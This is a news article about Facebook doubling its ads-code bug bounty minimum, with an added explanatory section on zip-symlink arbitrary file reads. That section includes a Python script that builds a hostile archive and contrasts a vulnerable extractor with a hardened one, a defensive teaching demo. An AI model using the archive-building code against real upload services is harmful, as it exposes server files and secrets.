Facebook has doubled the bounties for security vulnerabilities discovered in the code behind its advertising system, according to PC World. Researchers who find bugs in the ads code will now be paid at least $1,000, up from the previous $500 minimum.
Typical vulnerabilities in this area include incorrect permission checks, insufficient rate-limiting, edge-case CSRF issues, and Flash problems in the ads code. The social network announced it has just finished a "comprehensive" security audit of its ads code.
"We found and fixed a number of security bugs but would like to encourage additional scrutiny from Whitehats to see what we might have missed," Facebook security engineer Collin Greene wrote in a blog post.
"Also, since the vast majority of bug reports we work on with the Whitehat community are focused on the more common parts of Facebook code, we hope to encourage researchers to become more familiar with the surface area of ads to better protect the businesses that use them."
The security engineer also shared several tips for successfully finding bugs in ads code and listed some past ad bugs that have since been fixed:
- Redeeming the same ads coupon multiple times without expiry;
- Retrieving the name of an unpublished Page via the Ads Create Flow by guessing its Page ID;
- Arbitrary local file read via a .zip symlink.
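The last item in that list is worth unpacking, because the same bug class recurs wherever a server extracts user-supplied archives. A zip entry can carry Unix mode bits marking it as a symbolic link, with the link target stored as the entry's "file data". An extractor that faithfully recreates such entries plants a symlink inside the upload directory pointing anywhere on the filesystem; any later feature that reads files back out of that directory then follows the link and returns the target's contents. The script below is an added illustration and not Facebook's code or the original bug: it builds a constructed archive with one symlink entry, shows a naive extractor that recreates the link and lets a read-back routine leak a planted "secret" file, and a hardened extractor that refuses symlink entries. The hardened version also rejects `../`-style path traversal, which goes slightly beyond what the page describes but is the check a practitioner would pair with it. All file names, the `creative.png` entry and the `db_password` contents are constructed for the example.

```python
import io
import os
import stat
import tempfile
import zipfile


def build_symlink_zip(link_name, target):
    """Constructed attacker archive: a single entry that is a symlink to `target`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        # Unix mode bits live in the high 16 bits of external_attr;
        # S_IFLNK | 0o777 marks the entry as a symbolic link.
        info.external_attr = (stat.S_IFLNK | 0o777) << 16
        # For symlink entries the stored "file data" is the link target path.
        zf.writestr(info, target)
    return buf.getvalue()


def is_symlink_entry(info):
    """True if the entry's Unix mode bits say it is a symlink."""
    return stat.S_ISLNK(info.external_attr >> 16)


def naive_extract(zip_bytes, dest):
    """Vulnerable: recreates symlink entries exactly as stored in the archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            out_path = os.path.join(dest, info.filename)
            if is_symlink_entry(info):
                os.symlink(zf.read(info).decode(), out_path)
            else:
                zf.extract(info, dest)


def safe_extract(zip_bytes, dest):
    """Hardened: refuse symlink entries and any path that escapes `dest`."""
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_symlink_entry(info):
                raise ValueError("symlink entry refused: %s" % info.filename)
            out_path = os.path.realpath(os.path.join(dest, info.filename))
            if os.path.commonpath([dest_real, out_path]) != dest_real:
                raise ValueError("path escapes extraction dir: %s" % info.filename)
            zf.extract(info, dest)


def read_uploaded_file(dest, name):
    """Stand-in for an app feature that serves a file back out of the
    extracted upload (e.g. an ad creative). open() follows symlinks."""
    with open(os.path.join(dest, name), "rb") as f:
        return f.read()


def demo(extractor):
    """Plant a secret outside the upload dir, extract the hostile archive with
    `extractor`, then read the entry back. Returns the leaked bytes, or None
    if the extractor refused the archive."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")  # constructed target file
        with open(secret, "w") as f:
            f.write("db_password=hunter2\n")
        dest = os.path.join(tmp, "upload")
        os.makedirs(dest)
        archive = build_symlink_zip("creative.png", secret)
        try:
            extractor(archive, dest)
        except ValueError:
            return None
        return read_uploaded_file(dest, "creative.png")


if __name__ == "__main__":
    print("naive extractor leaked:", demo(naive_extract))
    print("safe extractor leaked:", demo(safe_extract))
```

Note that Python's own `ZipFile.extractall` does not recreate symlinks (it writes the target path as a regular file's contents), so the naive extractor here stands in for the many custom and third-party extractors, and the `unzip` command, that do. The check has to happen before extraction, because by the time the link exists on disk the damage is done.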
Besides APIs or analytics, Facebook encourages whitehats to discover ad bugs in "everything else."
"There is a lot of backend code to correctly target, deliver, bill and measure ads," Greene said. "This code isn't directly reachable via the website, but of the small number of issues that have been found in these areas, they are relatively high impact."
Since Facebook's bug bounty program debuted in 2011, whitehats have earned over $3 million for discovering new vulnerabilities. A year ago, Yahoo! made headlines after dropping T-shirt rewards in favour of cash bounties. The change came after several Swiss security researchers publicly shamed the company for offering branded clothing instead of money. Yahoo! announced it would replace T-shirt rewards with bounties of up to $15,000 for "new, unique and/or high risk" bugs.
For more information about Facebook's bug bounty program, "hunters" can also read this recent guide.